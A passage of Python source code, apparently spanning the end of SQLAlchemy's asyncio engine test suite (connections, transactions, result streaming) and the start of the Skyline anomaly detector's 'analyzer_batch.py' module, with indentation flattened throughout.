fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = testing.engines.testing_engine(
asyncio=True, transfer_staticpool=True
)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
@testing.requires.python37
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
analyzer_batch.py
|
from __future__ import division
import logging
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import Unpacker
import os
from os import kill, getpid
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
write_data_to_file, send_anomalous_metric_to, mkdir_p,
filesafe_metricname,
# @added 20170602 - Feature #2034: analyse_derivatives
nonNegativeDerivative, strictly_increasing_monotonicity, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200506 - Feature #3532: Sort all time series
sort_timeseries)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere_untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algorithms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# from algorithms import run_selected_algorithm
from algorithms_batch import run_selected_batch_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
# TODO if settings.ENABLE_CRUCIBLE: and ENABLE_PANORAMA
# from spectrum import push_to_crucible
skyline_app = 'analyzer_batch'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20190410 - Feature #2916: ANALYZER_ENABLED setting
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrics have negative values so that they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
try:
from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
except:
ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from types import TupleType
except ImportError:
eliminated_in_python3 = True
from redis import WatchError
from msgpack import packb
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from settings import ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
except:
        ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
# @added 20200815 - Feature #3678: SNAB - anomalyScore
try:
SNAB_DATA_DIR = settings.SNAB_DATA_DIR
except:
SNAB_DATA_DIR = '/opt/skyline/SNAB'
try:
SNAB_anomalyScore = settings.SNAB_anomalyScore
except:
SNAB_anomalyScore = {}
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
try:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = settings.ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
except:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = False
try:
BATCH_MODE = settings.BATCH_PROCESSING_BATCH_MODE
except:
BATCH_MODE = True
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class AnalyzerBatch(Thread):
"""
The AnalyzerBatch class which controls the analyzer.batch thread and spawned
processes.
Made with love to the analyzer_batch playlist:
https://soundcloud.com/earthgecko/sets/analyzer_batch
https://soundcloud.com/thedeltariggs/ode-to-jeremiah (I can't tell what I've seen..)
https://soundcloud.com/egroove/premiere-francesco-chiocci-feat-black-soda-musumeci-remix-connaisseur-recordings (picking up pieces of my weary mind)
https://soundcloud.com/when-we-dip/premiere-francesco-chiocci-ft-black-soda-black-sunrise-peter-pardeike-remix
https://soundcloud.com/timgreen/atelier-francesco-manuel-feat-astrid-dead-end-tim-green-remixcityfox-1
https://soundcloud.com/imbernonmusic/edu-imbernon-fixing-fires
https://soundcloud.com/deep-house-amsterdam/oliver-koletzki-deep-house-amsterdam-dgtl-podcast-007
https://soundcloud.com/crosstownrebels/crm140-damian-lazarus-the-ancient-moons-vermillion-agoria-remix-1
https://soundcloud.com/wiewouwat/joy-wellboy-before-the-sunrise
https://soundcloud.com/agoria/damian-lazarus-the-ancent-moons-vermillion-agoria-remix
https://soundcloud.com/wearesoundspace/premiere-just-her-feat-kieran-fowkes-let-myself-go
https://soundcloud.com/watergaterecords/matthias-meyer-november-rain
https://soundcloud.com/musicthatmakesmewannasurf/mixtape-2-w-kosson
"""
def __init__(self, parent_pid):
"""
Initialize the AnalyzerBatch
Create the :obj:`self.batch_exceptions_q` queue
Create the :obj:`self.batch_anomaly_breakdown_q` queue
"""
super(AnalyzerBatch, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.batch_exceptions_q = Queue()
self.batch_anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def spin_batch_process(self, i, run_timestamp, metric_name, last_analyzed_timestamp, batch=[]):
"""
Assign a metric and last_analyzed_timestamp for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_name: the FULL_NAMESPACE metric name as keyed in Redis
:param last_analyzed_timestamp: the last analysed timestamp as recorded
in the Redis key last_timestamp.basename key.
        :param batch: an optional list of [metric_name, last_analyzed_timestamp]
            items to be processed together in batch mode
        :return: returns True
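        A work item, as stored in the ``analyzer.batch`` Redis set, looks like
        ``['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000]``
        (taken from the example log lines quoted later in this method).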
"""
spin_start = time()
child_batch_process_pid = os.getpid()
metrics_processed = 0
if not batch:
batch_mode = False
metrics = [[metric_name, last_analyzed_timestamp]]
logger.info('child_batch_process_pid - %s, processing %s from %s' % (
str(child_batch_process_pid), metric_name, str(last_analyzed_timestamp)))
else:
batch_mode = True
metrics = batch
number_of_metrics = len(batch)
logger.info('child_batch_process_pid - %s, processing %s metrics in batch mode' % (
str(child_batch_process_pid), str(number_of_metrics)))
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Determine the unique Mirage and Ionosphere metrics once, which are
# used later to determine how Analyzer should handle/route anomalies
try:
mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
except:
mirage_unique_metrics = []
try:
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
        # In order to convert monotonic, incrementing metrics to a derivative
# metric
try:
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
try:
non_derivative_metrics = list(self.redis_conn_decoded.smembers('non_derivative_metrics'))
except:
non_derivative_metrics = []
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
non_smtp_alerter_metrics = []
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
non_smtp_alerter_metrics = []
for item in metrics:
metric_name = item[0]
last_analyzed_timestamp = item[1]
if batch_mode:
metrics_processed += 1
logger.info('processing metric %s of %s' % (
str(metrics_processed), str(number_of_metrics)))
# Identify last timestamp
metric_timestamp = None
# Identify anomalies
# Handle EXPIRATION_TIME
# Ship to Analyzer, Mirage or Ionosphere
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist and the timestamp in the work item is
# older than the last analyzed timestamp reported by Redis key, just
# skip and remove the work item
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# Check the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
last_redis_timestamp = 0
try:
last_redis_timestamp_data = self.redis_conn_decoded.get(last_metric_timestamp_key)
last_redis_timestamp = int(last_redis_timestamp_data)
except:
logger.error('error :: failed to get Redis key %s' % last_metric_timestamp_key)
get_raw_series = True
if last_redis_timestamp:
if last_redis_timestamp > last_analyzed_timestamp:
get_raw_series = False
logger.info('The %s is %s, the passed last_analyzed_timestamp is %s, not getting raw_series returning' % (
last_metric_timestamp_key, str(last_redis_timestamp),
str(last_analyzed_timestamp)))
if LOCAL_DEBUG:
logger.debug('debug :: getting Redis time series data for %s' % (base_name))
raw_series = None
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only resurface the timeseries if the work item timestamp is greater
# than the last analyzed timestamp reported by Redis key
if get_raw_series:
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined, returning')
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
if LOCAL_DEBUG:
logger.debug('debug :: got Redis time series data for %s' % (base_name))
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# euthanize keys if not done in roomba, allows for backfill processing
# via analyzer_batch
roombaed = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
if LOCAL_DEBUG:
logger.debug('debug :: checking if roomba needs to be run on %s' % (base_name))
now = int(time())
duration = settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME
key = metric_name
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
